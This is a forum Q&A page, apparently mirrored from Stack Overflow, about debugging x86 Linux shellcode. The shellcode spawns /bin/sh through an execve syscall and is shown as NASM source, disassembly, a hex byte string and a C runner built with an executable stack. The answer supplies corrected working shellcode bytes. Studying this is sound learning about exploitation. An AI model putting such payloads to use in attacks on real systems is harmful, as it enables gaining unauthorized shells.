Executing shellcode segmentation fault [closed]

2019-09-02 08:48发布

站内问答 / C
1143 1 5

I've compiled a basic exploit (basically, the source in C doesn't exploit nothing, simply execute the opcodes which execute Bash). The problem is when I execute the binary: "Segmentation fault".

Here what I've done:

executeBash.asm (NASM)

section .text
global _start
_start:
xor EAX, EAX           ; EAX = 0
push EAX               ; "\0\0\0\0"
push DWORD 0x68732F2F  ; "//sh"
push DWORD 0x6E69622F  ; "/bin"
mov EBX, ESP           ; arg1 = "/bin//sh\0"
push EAX     ; NULL -> args[1]
push EBX     ; "/bin//sh\0" -> args[0]
mov ECX, ESP ; arg2 = args[]
mov AL, 0X0B ; syscall 11
int 0x80     ; excve("/bin//sh", args["/bin//sh", NULL], NULL)

In the terminal:

prompt$ nasm -f elf32 executeBash.asm
prompt$ ld -m elf_i386 executeBash.o -o executeBash
prompt$ objdump -M intel,i386 -d executeBash

executeBash:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:   31 c0                   xor    eax,eax
 8048062:   50                      push   eax
 8048063:   68 2f 2f 73 68          push   0x68732f2f
 8048068:   68 2f 62 69 6e          push   0x6e69622f
 804806d:   89 e3                   mov    ebx,esp
 804806f:   50                      push   eax
 8048070:   53                      push   ebx
 8048071:   89 e1                   mov    ecx,esp
 8048073:   b0 0b                   mov    al,0xb
 8048075:   cd 80                   int    0x80
prompt$ # "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
prompt$ ./executeBash
$ exit
prompt$

The exploit in ASM runs perfectly.

exploitBash.c

void main()
{
    char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                       "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
    void(*fp) (void);
    fp = (void *)&shellcode;
    fp();
}


prompt$ gcc -m32 -fno-stack-protector -z execstack exploitBash.c -o exploitBash
prompt$ ./exploitBash
Segmentation fault

1条回答
走好不送
2楼-- · 2019-09-02 09:19

You forgot to set up edx so it contains whatever the C code last used it for and that's unlikely to be a valid environment pointer. In the standalone code, edx happened to be zero due to the initial startup state of the program. If you use strace you can see that the execve returns with -EFAULT and then execution continues past your code into garbage which then truely segfaults. You can fix the shellcode for example like this:

char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
               "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\x31\xd2\xcd\x80";

(I included a xor edx, edx before the int 0x80.)

查看更多
0人赞 添加讨论(0) 举报
登录 后发表回答
相关问题
查看全部
相关文章
查看全部
收藏的人(5)